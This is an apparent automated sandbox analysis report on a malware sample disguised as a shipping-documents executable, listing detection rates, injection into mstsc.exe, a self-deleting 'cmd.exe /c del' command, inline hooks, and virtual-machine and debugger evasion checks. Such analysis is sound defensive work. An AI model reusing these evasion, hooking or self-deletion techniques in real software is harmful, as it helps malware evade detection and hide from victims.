          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 202139769574 Shipping Documents.exeVirustotal: Detection: 33%
          Source: 202139769574 Shipping Documents.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile read: C:\Users\user\Desktop\202139769574 Shipping Documents.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'Jump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: 202139769574 Shipping Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 202139769574 Shipping Documents.exe, 00000001.00000003.646868549.0000000003230000.00000004.00000001.sdmp, 202139769574 Shipping Documents.exe, 00000002.00000002.700767024.0000000000A90000.00000040.00000001.sdmp, mstsc.exe, 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 202139769574 Shipping Documents.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: 202139769574 Shipping Documents.exe, 00000002.00000002.701928540.0000000002700000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.671162738.0000000005A00000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeUnpacked PE file: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00416950 push eax; retf 2_2_00416951
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041C167 push ebp; iretd 2_2_0041C16A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00417237 push es; retf 2_2_00417238
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00416BCC push cs; retf 2_2_00416BD4
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0040E394 push ebp; ret 2_2_0040E395
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00416486 push ecx; retf 2_2_0041648C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041DD91 push edi; ret 2_2_0041DD93
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041DE8C push FFFFFF81h; ret 2_2_0041DE8F
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041CEB5 push eax; ret 2_2_0041CF08
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041CF6C push eax; ret 2_2_0041CF72
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041CF02 push eax; ret 2_2_0041CF08
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0041CF0B push eax; ret 2_2_0041CF72
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_004077BF pushfd ; retf 2_2_004077C0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B0D0D1 push ecx; ret 2_2_00B0D0E4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0483D0D1 push ecx; ret 7_2_0483D0E4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00486950 push eax; retf 7_2_00486951
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048C167 push ebp; iretd 7_2_0048C16A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00487237 push es; retf 7_2_00487238
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00486BCC push cs; retf 7_2_00486BD4
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0047E394 push ebp; ret 7_2_0047E395
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_00486486 push ecx; retf 7_2_0048648C
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048DD91 push edi; ret 7_2_0048DD93
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048DE8C push FFFFFF81h; ret 7_2_0048DE8F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048CEB5 push eax; ret 7_2_0048CF08
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048CF6C push eax; ret 7_2_0048CF72
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048CF0B push eax; ret 7_2_0048CF72
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0048CF02 push eax; ret 7_2_0048CF08
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_004777BF pushfd ; retf 7_2_004777C0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile created: C:\Users\user\AppData\Local\Temp\nszCE87.tmp\22m80anrrsp.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xEE
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000004798E4 second address: 00000000004798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000479B5E second address: 0000000000479B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00409A90 rdtsc 2_2_00409A90
          Source: C:\Windows\explorer.exe TID: 6160Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 6160Thread sleep time: -68000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 744Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,1_2_004059F0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_0040659C FindFirstFileA,FindClose,1_2_0040659C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_004027A1 FindFirstFileA,1_2_004027A1
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.680935628.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.672497965.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.680935628.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.917276050.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.681240089.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.681489254.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000004.00000000.669826337.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00409A90 rdtsc 2_2_00409A90
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_0040ACD0 LdrLoadDll,2_2_0040ACD0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_10001000 mov eax, dword ptr fs:[00000030h]1_2_10001000
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF90AF mov eax, dword ptr fs:[00000030h]2_2_00AF90AF
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]2_2_00AE20A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]2_2_00AE20A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]2_2_00AE20A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]2_2_00AE20A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]2_2_00AE20A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE20A0 mov eax, dword ptr fs:[00000030h]2_2_00AE20A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEF0BF mov ecx, dword ptr fs:[00000030h]2_2_00AEF0BF
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEF0BF mov eax, dword ptr fs:[00000030h]2_2_00AEF0BF
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEF0BF mov eax, dword ptr fs:[00000030h]2_2_00AEF0BF
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9080 mov eax, dword ptr fs:[00000030h]2_2_00AB9080
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B33884 mov eax, dword ptr fs:[00000030h]2_2_00B33884
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B33884 mov eax, dword ptr fs:[00000030h]2_2_00B33884
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB58EC mov eax, dword ptr fs:[00000030h]2_2_00AB58EC
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B4B8D0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov ecx, dword ptr fs:[00000030h]2_2_00B4B8D0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B4B8D0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B4B8D0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B4B8D0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4B8D0 mov eax, dword ptr fs:[00000030h]2_2_00B4B8D0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]2_2_00AE002D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]2_2_00AE002D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]2_2_00AE002D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]2_2_00AE002D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE002D mov eax, dword ptr fs:[00000030h]2_2_00AE002D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]2_2_00ACB02A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]2_2_00ACB02A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]2_2_00ACB02A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACB02A mov eax, dword ptr fs:[00000030h]2_2_00ACB02A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37016 mov eax, dword ptr fs:[00000030h]2_2_00B37016
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37016 mov eax, dword ptr fs:[00000030h]2_2_00B37016
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37016 mov eax, dword ptr fs:[00000030h]2_2_00B37016
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B84015 mov eax, dword ptr fs:[00000030h]2_2_00B84015
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B84015 mov eax, dword ptr fs:[00000030h]2_2_00B84015
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B72073 mov eax, dword ptr fs:[00000030h]2_2_00B72073
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B81074 mov eax, dword ptr fs:[00000030h]2_2_00B81074
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD0050 mov eax, dword ptr fs:[00000030h]2_2_00AD0050
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD0050 mov eax, dword ptr fs:[00000030h]2_2_00AD0050
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]2_2_00B351BE
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]2_2_00B351BE
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]2_2_00B351BE
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B351BE mov eax, dword ptr fs:[00000030h]2_2_00B351BE
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE61A0 mov eax, dword ptr fs:[00000030h]2_2_00AE61A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE61A0 mov eax, dword ptr fs:[00000030h]2_2_00AE61A0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B369A6 mov eax, dword ptr fs:[00000030h]2_2_00B369A6
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA185 mov eax, dword ptr fs:[00000030h]2_2_00AEA185
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADC182 mov eax, dword ptr fs:[00000030h]2_2_00ADC182
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2990 mov eax, dword ptr fs:[00000030h]2_2_00AE2990
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]2_2_00ABB1E1
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]2_2_00ABB1E1
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABB1E1 mov eax, dword ptr fs:[00000030h]2_2_00ABB1E1
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B441E8 mov eax, dword ptr fs:[00000030h]2_2_00B441E8
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]2_2_00AD4120
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]2_2_00AD4120
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]2_2_00AD4120
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120 mov eax, dword ptr fs:[00000030h]2_2_00AD4120
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD4120 mov ecx, dword ptr fs:[00000030h]2_2_00AD4120
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE513A mov eax, dword ptr fs:[00000030h]2_2_00AE513A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE513A mov eax, dword ptr fs:[00000030h]2_2_00AE513A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9100 mov eax, dword ptr fs:[00000030h]2_2_00AB9100
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9100 mov eax, dword ptr fs:[00000030h]2_2_00AB9100
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9100 mov eax, dword ptr fs:[00000030h]2_2_00AB9100
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC962 mov eax, dword ptr fs:[00000030h]2_2_00ABC962
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABB171 mov eax, dword ptr fs:[00000030h]2_2_00ABB171
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABB171 mov eax, dword ptr fs:[00000030h]2_2_00ABB171
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADB944 mov eax, dword ptr fs:[00000030h]2_2_00ADB944
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADB944 mov eax, dword ptr fs:[00000030h]2_2_00ADB944
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]2_2_00AB52A5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]2_2_00AB52A5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]2_2_00AB52A5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]2_2_00AB52A5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB52A5 mov eax, dword ptr fs:[00000030h]2_2_00AB52A5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]2_2_00ACAAB0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]2_2_00ACAAB0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]2_2_00AEFAB0
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AED294 mov eax, dword ptr fs:[00000030h]2_2_00AED294
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AED294 mov eax, dword ptr fs:[00000030h]2_2_00AED294
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]2_2_00AE2AE4
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2ACB mov eax, dword ptr fs:[00000030h]2_2_00AE2ACB
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF4A2C mov eax, dword ptr fs:[00000030h]2_2_00AF4A2C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF4A2C mov eax, dword ptr fs:[00000030h]2_2_00AF4A2C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC8A0A mov eax, dword ptr fs:[00000030h]2_2_00AC8A0A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD3A1C mov eax, dword ptr fs:[00000030h]2_2_00AD3A1C
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB5210 mov eax, dword ptr fs:[00000030h]2_2_00AB5210
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB5210 mov ecx, dword ptr fs:[00000030h]2_2_00AB5210
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB5210 mov eax, dword ptr fs:[00000030h]2_2_00AB5210
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB5210 mov eax, dword ptr fs:[00000030h]2_2_00AB5210
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABAA16 mov eax, dword ptr fs:[00000030h]2_2_00ABAA16
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABAA16 mov eax, dword ptr fs:[00000030h]2_2_00ABAA16
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF927A mov eax, dword ptr fs:[00000030h]2_2_00AF927A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6B260 mov eax, dword ptr fs:[00000030h]2_2_00B6B260
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6B260 mov eax, dword ptr fs:[00000030h]2_2_00B6B260
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88A62 mov eax, dword ptr fs:[00000030h]2_2_00B88A62
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7EA55 mov eax, dword ptr fs:[00000030h]2_2_00B7EA55
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B44257 mov eax, dword ptr fs:[00000030h]2_2_00B44257
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]2_2_00AB9240
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]2_2_00AB9240
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]2_2_00AB9240
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB9240 mov eax, dword ptr fs:[00000030h]2_2_00AB9240
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4BAD mov eax, dword ptr fs:[00000030h]2_2_00AE4BAD
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4BAD mov eax, dword ptr fs:[00000030h]2_2_00AE4BAD
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4BAD mov eax, dword ptr fs:[00000030h]2_2_00AE4BAD
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B85BA5 mov eax, dword ptr fs:[00000030h]2_2_00B85BA5
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC1B8F mov eax, dword ptr fs:[00000030h]2_2_00AC1B8F
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC1B8F mov eax, dword ptr fs:[00000030h]2_2_00AC1B8F
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6D380 mov ecx, dword ptr fs:[00000030h]2_2_00B6D380
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2397 mov eax, dword ptr fs:[00000030h]2_2_00AE2397
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7138A mov eax, dword ptr fs:[00000030h]2_2_00B7138A
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEB390 mov eax, dword ptr fs:[00000030h]2_2_00AEB390
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]2_2_00ADDBE9
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE03E2 mov eax, dword ptr fs:[00000030h]2_2_00AE03E2
